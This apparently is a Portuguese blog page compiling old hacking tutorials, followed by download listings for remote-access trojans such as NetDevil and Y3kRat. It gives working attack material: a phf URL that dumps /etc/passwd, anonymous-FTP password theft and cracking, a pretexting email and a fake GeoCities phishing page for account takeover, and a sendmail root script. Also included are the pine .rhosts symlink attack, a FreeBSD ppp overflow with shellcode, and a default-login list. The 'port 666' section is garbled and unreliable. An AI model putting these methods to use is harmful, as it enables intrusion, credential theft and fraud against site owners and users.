4. Bug no sistema Batch do PCBoard îîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîî Devido a este assunto ser relativamente extenso farei algumas divis"es para um melhor compreendimento bem como uma melhor organiza‡„o no texto. 1¦ Parte - Fazendo downloads por outros meios ùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùù O comando Download (D) na realidade faz apenas a leitura do arquivo BATCH do PCBoard (lista dos arquivos) e envia para vocˆ os mesmos, por‚m esta n„o ‚ a unica forma. Por exemplo, o comando B (Boletins) permite vocˆ fazer download dos mesmos caso vocˆ intercale comandos, tais como B D #do boletim. Pense um seguinte, se vocˆ marcar arquivos, por‚m o sistema n„o deixe dispon¡vel o comando D, use o comando B D A para retirar os arquivos marcados (muito util no Mandic BBS, por ex ;))) Outra forma ‚ vocˆ usar o R L QW, que retirar um pacote de mensagens com as ultimas, por‚m, este pacote ser mais um no batch, ou seja, o PCBoard enviar todo o batch. ¨CASOS e CASOS? - Se o sistema estiver setado para no m ximo 1 arquivo no batch, n„o adianta vocˆ querer usar estes comandos, pois o arquivo enviado no sistema R L QW ser o pacote de mensagens (1a. prioridade) e no caso dos boletins, somente o primeiro arquivo marcado da lista. 2¦ Parte - Fazendo repeti‡„o de arquivos ùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùù Vocˆ sabe que o PCBoard dispoe de um comando util, D ap¢s o comando L ou ap¢s o comando Z, ou seja, todos os arquivos listados nesta se‡„o ser„o automaticamente marcados e retirados na pr¢xima partida para download (nem diria comando, pois as formas de download s„o diversas, como diz o t¢pico acima) Este bug torna-se meio complicado de se explicar, no entanto basta saber que, arquivos duplicados em batch (vocˆ conhece esta mensagem) n„o s„o contatos quanto a tempo e bytes. Veja o exemplo abaixo para obter aux¡lio: ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ (30 minutos) Comando? L *.* 4 D NS ³ ³ (30 minutos) Comando? D ³ ³ XYZ arquivos n„o podem ser marcados por falta de tempo ³ ³ (A)borta, (G)oodbye, (P)rotocolo, etc... (A) ³ ³ (30 minutos) Comando? L *.* 4 D NS ³ ³ (30 minutos) Comando? D ³ ³ XYZ arquivos duplicados, n„o marcados. ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Na £ltima linha observa-se que alguns arquivos foram duplicados, estes o PCBoard n„o contar . Portanto, aqueles XYZ iniciais ser„o marcados, ou seja, se a transferˆncia tivesse no m ximo 30 minutos, esta ser agora de 60, se vocˆ fizer mais uma vez, no caso da area ter mais de #P arquivos, a transferˆncia ser de 120 minutos, e assim vai. Corre‡„o: Esta no pacote fornecido por mim, na minha BBS. 3¦ Parte - Bug nas portas ùùùùùùùùùùùùùùùùùùùùùùùùù Vocˆ certamente ja viu a mensagem: Abrindo x porta a lista de arquivos ser apagada, ou arquivos marcados ser„o perdidos. No entanto, esta parte vai mais para os usu rios simples. N„o ligue para isso, pois quando vocˆ retorna o Batch esta l , pois fisicamente n„o h motivos para o PCBoard apagar a lista de arquivos. Lendo as partes 1 e 2, vocˆ saber como usar isso para obter espa‡o maior, em rela‡„o a bytes e minutos. 5. Bug em linhas de parametros ùùùùùùùùùùùùùùùùùùùùùùùùùùùùùù Este BUG n„o tive muito tempo para analisar, mais assim a princ¡pio as linhas de parƒmetros acess¡veis s„o: Download e Upload, mas o por que destas linhas estarem relacionadas ao bug? Esperimente digitar @CLS@, ou entao @BEEP@, vocˆ perceber que: ú As fun‡"es dos respectivos comandos foram assumidas tais como limpar a tela e soar um BEEP sonoro. Imagina se usar a fun‡„o POS e colocar um PPE intercalado no in¡cio da tela, vocˆ poder rodar um PPE (espero eu)

Hackeando Home Pages!

HACKEANDO HOME PAGES Texto por: ««Ø_|-|Å©KË®»» 1-INTRODUÇÃO : O texto a seguir fala sobre como hackear uma home page. Aqui estão as suas seções : Precauções-cuidados que você deve tomar. Sobre as senhas-arquivos falando sobre as senhas. Desencryptando as senhas-como desencryptar senhas. Ftp-como hackear uma HP por ftp. Phf-como hackear uma HP usando o método phf Home page grátis-como hackear servidores de home page grátis Home page grátis 2-Outro método de como hackear servidores de home pages grátis Já cadastrado-Como hackear uma home page que você já tenha cadastro no mesmo servidor Telnet e exploits-Como hackear uma page usando telnet e exploits Já cadastrado 2-Outro metodo de como hackear uma hp que você já tenha cadastro no mesmo servidor. 2-PRECAUÇÕES: Nesse texto vou ensinar deversos métodos de como hackear uma home page. Queria avisar que hackear uma home page é considerado crime e que isso dá cadeia. Toda vez que você entra em um sistema seu IP fica gravado e "eles" vão poder te encontrar. Portanto antes de cometer um ato como esse eu sugiro que vocês tomem umas medidas de segurança como spoofing e etc... 3-SOBRE AS SENHAS : A senha esta em um arquivo chamado passwd. Esse arquivo está normalmente em um diretório chamado etc/passwd. Então vamos falar um pouco sobre o passwd. Quando você pega o arquivo passwd, a senha pode vir encryptada ou então com shadow! A diferença é que a senha encryptada é a própria senha só que esta encryptada e a senha com shadow faz com que a senha fique escondida em outro lugar! Ou seja, não vai estar no passwd, vai estar em outro diretório. Para obter a senha escrita você vai ter que desencripta-la! As senhas com shadow são impossíveis de "desencryptar"! (levando em conta que você não tem unix). Uma senha encryptada é mais ou menos assim : root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh Agora o exemplo de uma senha com shadow : root:x:0:1:0000-Admin(0000):/:/usr/bin/csh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/ usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false Você pode notar que tem um "x" no root! Esse x pode ser representado também por um "*". Agora você já sabe um pouco mais sobre o arquivo passwd e sobre as senhas. 4-DESENCRYPTANDO : Para desencryptar uma senha precisaremos de três arquivos básicos. Uma word list, um desencryptador (recomendo o crackerjack/jack 14)e logicamente o arquivo onde está senha(passwd). O que é cada um? Word list- Como o próprio nome já diz, é uma lista de palavras. Desencryptador- É o programa que você vai usar para desencryptar a senha. Passwd- Nesse arquivo está a senha encryptada. Coloque todos esses itens nesse mesmo diretório. Abra o prompt do DOS e entre no diretório onde eles estão. Agora faça o seguinte, digite : "nome do programa desencryptador" "nome do arquivo onde esta a senha" "nome da sua word list" Então vamos supor que meu programa é o jack, o arquivo é o passwd, a word list é lista. Então ficaria assim : jack passwd lista.txt E pronto! A senha está desencryptada! Mas como isso funciona?? Quando você roda o jack ele pega o arquivo passwd e testa com todas as palavras da word list. 5-FTP Hackear uma HP por ftp talvez seja o melhor metodo. É bem simples e rápido de ser feito. Para fazer isso vamos usar o prompt do MS-DOS. Espero que você saiba pelo menos mexer no básico do DOS. O que vamos faz é simplesmente entrar no ftp da home page com login anonymous e fazer o download do arquivo passwd. Abra o prompt do DOS. Você vai ter que entrar no ftp da HP que voce quer hackear. Normalmente a endereço é o mesmo da home page. Então digite ftp www.hackers.com Ele vai pedir seu USER. Coloque anonymous. Agora vai pedir que você coloque seu e-mail completo como senha. Claro que você vai colocar alguma coisa qualquer, tipo fuckyou@idiota.com. Você vai entrar no ftp como user anonymous e retrictions applly! Isso significa que você entrou como anonymous e com restrições aplicadas! Agora você precisa ir para o diretório etc. Entre e faça o donwload do passwd. Pra isso digite "get passwd". Pronto, o arquivo passwd vai estar no diretório que você estava quando entrou no ftp. Tipo windows, arquivos de programas.... Agora você que tem o arquivo só precisa desencryptalo e pronto! A senha estará em suas mãos.. 6-PHF : O phf é com certeza o modo mais simples de se obter o arquivo passwd. É tão simples que você não precisa saber nada! A única coisa que você tem que fazer é abrir seu browser e colocar uma URL. Porém esse método tem 95% de chance de não funcionar! A maioria dos servidores já acharam o bug e concertaram. Só colocar essa URL no location do seu browser : http://Endereço_da_pagina/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd Apenas isso e pronto! 7-HACKEANDO SERVIDORES DE HOME PAGES GRATIS (1): Alguns servidores de home page tipo a geocities, tripod e a angelfire, dão espaço para pessoas colocarem suas home pages no ar. Há um modo bem simples de se obter ]a senha de home pages que estão nesses servidores. Tudo que voce tem que fazer é mandar um e-mail pedindo pra eles te mandarem a senha da home page. Mas não mande um e-mail estúpido tipo : "por favor me mandem a senha". Façam algo mais convincente. Pegue todas as informações da HP possíveis. Do tipo : "Mês passado eu me cadastrei no serviço de vocês e recebi uma senha e um user name e meu endereço "endereço da HP do cara". Eu coloquei algumas coisas no meu espaço e saí de férias. Quando voltei das ferias eu tinha me esquecido da senha!! Só me lembrava do user name, que é : "user name da HP". Fiquei um bom tempo de ferias e não pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de vocês. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que vocês me mandem um e-mail para "seu e-mail". Porque eu não tenho o backup dos arquivos que coloquei lá e não gostaria de perde-los. Obrigado pela atenção. Espero que voces mandem a senha o mais rápido que puderem." Companhias como a geocities são muito ocupadas pra ficar verificando se é verdade eu não! Provavelmente eles iram acreditar e em 2 semanas(mais ou menos) você receberá a senha no seu e-mail! 8- HACKEANDO SERVIDORES DE HOME PAGES GRATIS (2): Outro modo de hackear esse tipo de home pages é enganar o próprio webmaster da HP! Esse modo funciona normalmente com webmasters idiotas que não sabem muito coisa e nem percebem que eles mesmos estão dando a senha para o hackeador. É outro método bem simples mas um pouco mais demorado. O que você tem que fazer é criar uma pagina onde você finge que é a geocities que esta dando mais megas para HP's! Ou seja, você terá que criar uma página imitando a geocities! Faça uma pagina exatamente no estilo da da geo. E coloque tudo com as mesmas gifs, mesmos banners e coloque um formulário pra ser preenchido e diga que quem preencher aquilo vai ganhas mais 10 megas livre de espaço pra HP!!! Nesse formulário o cara terá que colocar o user e a senha da HP, o endereço e etc.... Para o cara "receber" os megas ele terá que enviar o formulário. Para isso ela deverá clicar em algum botão de envio, normalmente um botão que fica escrito "submit" Quando a pessoa clica no botão submit formulário é enviado para a geocities pois aquele botão tem um comando para enviar para a geocities.Então o que você terá que fazer é mudar o comando. Em vez do formulário ser enviado para a geocities esse formulário vai ser enviado para o seu e-mail. Para isso você terá que editar a pagina da geocities. No lugar que tem escrito: Você tará que trocar para : Então assim que o cara clicar no botão submit todos os dados seram enviados para o seu e-mail. E assim você terá a senha. Agora é só pegar um endereço na net e colocar essa pagina editada na geocities nele e mandar as pessoas visitarem. E pronto! O formulário vai chegar com a senha e user name no teu e-mail. Há uma tecnica parecida com essa mas é MUITO mais complicada. Pra isso você vai precisar de um servidor pessoal e terá que mudar algumas configurações em TCP/IP Pra isso abra o painel de controle e entre no ícone redes. Agora entre nas propriedades de TCP/IP. Entre na conficuração DNS. Selecione ativar DNS. Agora escreva no HOST-->WWW.GEOClTIES(repare que geocities está escrito com "l" e não um "i") Então escreva no dominio-->COM. Agora dê OK em tudo. Vai pedir que você reinicie o micro. Pode reiniciar. Siga o mesmo procedimento do formulário e da pagina da geocities da explicação anterior. Salva essa pagina e coloque-a no diretório de paginas do seu servidor. Então voce cria um diretório chamado "members", entra nesse diretório e crie um, diretório chamado "tools". Coloque tudo da page editada nesse diretório. Coloque seu servidor pra funcionar e mande o cara entrar em : HTTP://WWW.GEOClTIES.COM/members/tools/file_manager.html O endereço tem que ser esse. Se a pessoa entrar no file manager da geocities isso não vai funcionar(ooohhh!!!) Quando o cara colocar os dados dele lá e enviar estará tudo no teu mail! Queria avisar que esses metodos também funcionam com a angelfire e com a tripod. A geocities foi usada como exemplo. 9-HACKEANDO UMA HP EM QUE VOCE JÁ TENHA CADASTRO NO MESMO SERVIDOR Esse método é realmente difícil de funcionar mas as vezes funciona com uns admins bem idiotas. Quando você entra no seu ftp você pode sair do seu diretório home (diretorio onde você esta assim que entra) e voltar alguns diretórios até encontrar o diretório da HP que você quer hackear. Uma vez que voce já fez, se você puder ter acesso aos arquivos HTML pegue-os e edite eles! E pronto! Com admins mais inteligentes você não consegue ter acesso os arquivos da page alvo. 10-TENET E EXPLOITS : Exploits é talvez o melhor método de hackear uma home page. Mas ele é um pouco mais complicado do que os outros métodos como phf e ftp. Antes de tudo você vai precisar de um programa de telnet. Exploits expo em erros e bugs nos sistemas e normalmente te dão root, sysop, admin.... Vou listar alguns exploits abaixo : Esse se chama sendmail bug. Ele cria um programa /tmp/x que chama shells como root. ----------------------------------------------------------------------------------------------------------------------------- cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi ---------------------------------------------------------------------------------------------------------- Agora mais um exploit. Eu vou mostrar o "pine exploit" vendo o processo da tabela com ps você pode ver os usuário rodando o pine. Um então pode fazer um ls no /tmp/ pra conseguir o nome do lockfile pra cada usuário. Vendo o processo da tabela de novo vai revelar quais usuarios ou saem com mensagens não lidas nos seus inbox. Efetivamente deletando o lockfile respectivo. Criando um link de /tmp/.hamors_lockfile para ~hamors/.rhosts vai fazer com que o pine crie ~hamors/.rhosts como com um arquivo 666 com as identidades processadas e que elas contém. Agora precisa fazer um " echo "+ +" > /tmp/.hamors_lockfile e rm /tmp/.hamors_lockfile. -------------------------------------------------------------------------------------------------------- hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + + catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors Esse é o ultimo que vou relacionar aqui. Exploitation script para vunerabilidade ppp. Funciona em "FreeBSD". #include #include #include #define BUFFER_SIZE 156 /* size of the bufer to overflow */ #define OFFSET -290 /* number of bytes to jump after the start of the buffer */ long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */ int i,j; buf = malloc(4096); /* fill start of bufer with nops */ i = BUFFER_SIZE-strlen(execshell); memset(buf, 0x90, i); ptr = buf + i; /* place exploit code into the buffer */ for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; ptr = (char *)addr_ptr; *ptr = 0; setenv("HOME", buf, 1); execl("/usr/sbin/ppp", "ppp", NULL); } Agora voce tem o root. Faça o que você quiser! Mas eu trocaria logo a senha da HP antes de mexer em qualquer coisa ou deletar. Pra trocar a senha da HP voce tem que é entrar via telnet E entrar com sua nova conta Ae voce digita "passwd :". Vai pedir a senha antiga e depois a senha que você quer colocar. Agora você só voce tem a senha e então é só fazer o que você quiser como deletar tudo e fazer o Upload das suas paginas. 11-HACKEANDO UMA HP QUE VOCÊ TENHA CADASTRO NO MESMO SERVIDOR.(2) Eu li esse texto e achei bem interessante falar sobre ele. Eu nao vou escrever esse metodo por mim porque prefiro deixar ele intacto, pois por descuido eu poderia corromper alguma informação. Infelizmente o texto é em ingles! Desculpe se você nao fala... Exploiting Net Adminstration CGI (taken from a text by Lord Somer) Well since nethosting.com either shutdown or whatever I figured what the hell before I forget how I did the more recent hacks etc... I'd tell you how so maybe you'll find the same sys elsewhere or be able to use it for ideas. Basically Nethosting.com did all it's administration via cgi's at net-admin.nethosting.com, well you need an account, card it if necessary, log in to net-administration, you'll see crap like ftp administration, email, etc... who really cares about e-mail so we'll go to ftp. Click on ftp administration. Lets say you were logged in as 7thsphere.com your url would be something like: http://net-admin.nethosting.com/cgi-bin/add_ftp.cgi?7thsphere.com+ljad32432jl Just change the 7thsphere.com to any domain on the sys or if in the chmod cgi just del that part but keep the + sign and you edit the /usr/home dir. In the ftp administration make a backdoor account to that domain by creating an ftp who's dir is / since multiple /// still means /. Once you have your backdoor have fun. Oh yeah and in the email you can add aliases like I did to rhad's e-mail account at 7thsphere, why the hell is he on that winsock2.2 mailing list? Well the basic theory of this type of exploitation is that: the cgi is passed a paramater which we change to something else to edit it's info since it uses the stuff after the + to check that it's a valid logged in account(like hotmail does), it dosen't check the password again. multiple ///'s in unix just mean a /, thus we can get access to people's dir or the entire /usr/home dir Eu queria avisar aqui que todos os items relacionados aqui realmente funcionam! Se você nao conseguir, foi porque cometeu algum erro, ou fez "mal feito". Muita gente tem reclamado que não funciona... Se você entendeu tudo perfeitamente você pode hackear quase qualquer home page.

Invadindo Pela Porta 666

Invasão pela port 666 Esta primeira maneira é feita através da port 666 q é de uso xclusico do governo Americano. Para invadir é facil vc deve ter um programa de conexão via telenet (telnet q ja vem com o WIN95 ou similar) e também um programa chamado aabout. O q deve ser feito, este programa aabout deve ser acionado por ambas as parte (invasor e invadido) e o q ele faz?? Bem, ele abre uma porta de conexão entre os dois CPUs via a port 666. Vc deve ligar o telenet colocar no rost o numero do IP da pessoa e em port deve-se colocar 666. Bem vc ja esta conectado, dai no login vc deve digita cg! (com o "!") e dar um dir vendo tudo o q tem no CPU da outra pessoa. texto feito por «2001¤ØBP ëh» (fonte: primeira edição da D.O.N.)

FTP Bug's

FTPsBUGS "O texto orginal foi pego na Internet, a versão em Inglês, cujo o autor é desconhecido. Esta é uma versão em protuguês traduzida por.............. CRYPT O Buffer overflow do progama War FTP Daemon 1.65 para Windows 95/NT O popular progama WAR FTP Daemon para Windows 95 e NT contém um péssimo Buffer Overflow que permite que usuários mal intencionados executem códigos no seu HD ou simplesmente foder com o servidor de FTP O overflow existe em vários lugares incluindo o login de USER e PASS. Para vc "exploitar" vc precisa conectar em um servidor de WAR FTPD (porta 21 né o mané) e utilizar o seguinte comando: USER xxxxxxxxxxxxxxxxxxxxxxxxxxxxx (sentença bem longa) ou PASS xxxxxxxxxxxxxxxxxxxxxxxxxxxxx (sentença bem longa) A este ponto o WAR FTPD deverá quebrar. Agora nós estamos como Super-Usuários (o bom e velho root) e não mais como usuários de FTP comun e nos não precisamos de muitos recursos ou tempo para escrever o comando atual, de qualquer modo isto é possível!!! Durante os testes de bugs do WAR FTP, eu vi coisas interessantes sobre Overflows no MT 3.51/4.0, e no clinte de FTP do Win 95 Estes são os 3 ultimos problemas de Overflow no cliente de FTP 1º- O 1º problema é no campo do username. Faça um username maior que 285 caracteres, e o ftp.exe vai causar um problema de acesso. isto afeta somente Win NT 3.51/4.0.....principalmente no Windows 95 onde 154 caracteres já bastão 2º- O 2º problema esta no campo do password. Não tenho certeza de quantos caracteres são para isto acontecer, mas se vc segurar alguma tecla por alguns minutos e depois volte a pressiona-la denovo, vc vai causar uma bomba para FTP. Este só funciona em Win 95 3º-O 3º é com o comando de fpt. Digite em qualquer comando negado mais que 207 caracteres. O ftp.exe irá causar um procedimento de problema de acesso denovo. Isso afeta Win NT e Win 95 com clientes FTP

Invadindo por UNIX

NVASÃO, ENTRANDO SEM SER CONVIDADO NOS PROVEDORES OBS: Quando vc for invadir, ficará um arquivo LOG no servidor que vc invadiu. Com seus dados, e o que vc fez la dentro. Portanto, tente não fuder com nada! Outra aviso importantissímo! Antes de mais nada certifique-se de que o servidor ou o FTP, seja realmente de Unix. Se não a maioria (ou todo esse texto) não valerá nada. Geralmente os sistemas mais usados são Unix em 1º lugar, se não for Unix pode ser Vax, Prime ou Novell ou qquer outra merda. Na hora que vc entrar deverá aparecer o tipo de servidor. Se aparecer alguma coisa Unix vc o sistema é Unix. Se aparecer escrito outra coisa desista! Invadindo no Windows 95, pelo FTP do Dos: INVADINDO FANTASMA Vá no prompt do DOS. Digite "ftp", depois "open". Agora ponha o nome do local a ser invadido, por exemplo: ftp.merda.com.br. Qdo pedir o Login aperte ENTER, quando pedir a senha, aperte ENTER denovo. A segui digite: quote user ftp quote pass ftp INVADINDO ANÔNIMO Vá no prompt do DOS. Digite "ftp", depois "open". Agora ponha o nome do local a ser invadido, por exemplo: ftp.merda.com.br. Então vai aparecer uma tela pedindo o Login e a senhas. Digite anonymous como login e guest como senha UTILIZANDO SENHAS DOS INFELIZES CLIENTES DESSE PROVEDOR QUE ESTÃO ONLINE Entre fantasma. Depois basta usar os comandos who, rwho e finger e ver os usuários que estão Online para entrar com suas senhas posteriormente. UTILIZANDO LOGINS DE DEFAULT Logins de default, são logins que ja vem com o sistema. Geralmente qdo o SysOp é uma anta vc pode entrar fácil no sistema usando esses defaults. Login: Password: root root root system sys sys sys system daemon daemon uucp uucp tty tty test test unix unix unix test bin bin adm adm adm admin admin adm admin admin sysman sysman sysman sys sysman system sysadmin sysadmin sysadmin sys sysadmin system sysadmin admin sysadmin adm who who learn learn uuhost uuhost guest guest host host nuucp nuucp rje rje games games games player sysop sysop root sysop demo demo O que fazer la dentro? Boa pergunta! La dentro vc pode fucar no dominio invadido. Se vc der sorte pode ateh ser preso! COMANDOS PARA SUA INVASÃO ls -l: lista os arquivos de um diretório. Parâmetros principais: t, a, F, R,l ls -al: lista todos os arquivos de um diretório, mesmo os ocultos cp 1 2: copia o arquivo do diretório 1 para o diretório 2 (o caminho de diretório deve ser colocado por inteiro) mv 1 2: move o arquivo do diretório 1 para o diretório 2 (o caminho de diretório deve ser colocado por inteiro) rm: deleta arquivo cd: muda o diretório cd: muda o diretório ativo para o que está 'acima' do atual mkdir: cria o diretório dentro do diretório atual rm: remove o diretório. Parâmetros principais: r, i cat: mostra o conteúdo do arkivo pwd: exibe o diretório atual clear: limpa a tela Find: procura arquivo. Parâmetros rpincipais: name, group, user get: copia o arquivos escolhido para o seu micro. SE O SEU OBJETIVO É PEGAR SENHAS Provavelmente, vc não está invadindo à toa. Se vc quiser pegar as senhas deste servidor, faça o seguinte: Procure por um arquivo chamado passwd, ou passw, ou qualquer coisa do genêro. Ele geralmente está no diretório etc. Mas se vc n acha-lo no etc, procure nos diretórios pub e bin. Para vc andar pelos diretórios utilize o comando cd mais o nome do diretório. Para vc dar um dir utilize o comando ls -a. Se o servidor não tiver uma boa segurança vc vc vai acha-lo, facilmente. Quando vc achar o arquivo, vc pdoe copiá-lo usando o comando get. Por exemplo: get passwd. Se vc conseguir copiar o file ele irá parar no dir do seu Rwin. Invadindo no Windows 95, com progama de FTP: OBS: Esse método eh mais perigoso, pois com ele as chances de deletar ou estragar algo são bem maiores. TOME CUIDADO GAROTO (A)! Preencha o troço da conexão da seguinte maneira: Profile name: Nome do servidor Host name: Endereço do ftp, por exemplo: ftp.merda.com.br Host type: Ai depende do server. Ponha no Unix (Standar), que é o mais usado Agora clique em OK. Pronto, vc invadiu. A vantagem de usar progama de FTP eh que da pra copiar os files.

sexta-feira, 9 de novembro de 2007

SuperStar v1.2

Arquivo:

Tamanho:

Download:



SuperStar v1.2 .rar

Nao informado



ToxiBackDoor.rar

Arquivo:

Tamanho:

Download:



ToxicBackDoor.rar

Nao informado



Run_V1 Beta. rar

Arquivo:

Tamanho:

Download:




Nao informado



xploit%201.4.5.zip

Arquivo:

Tamanho:

Download:



xploit%201.4.5.zip

Nao Inrformado



Y3kRat2k5RC10.zip

Arquivo:

Tamanho:

Download:



Y3kRat2k5RC10.zip

Nao Informado



NETDevil v1.0

Arquivo:

Tamanho:

Download:



NetDevil v1.0 Zip

794.1 KB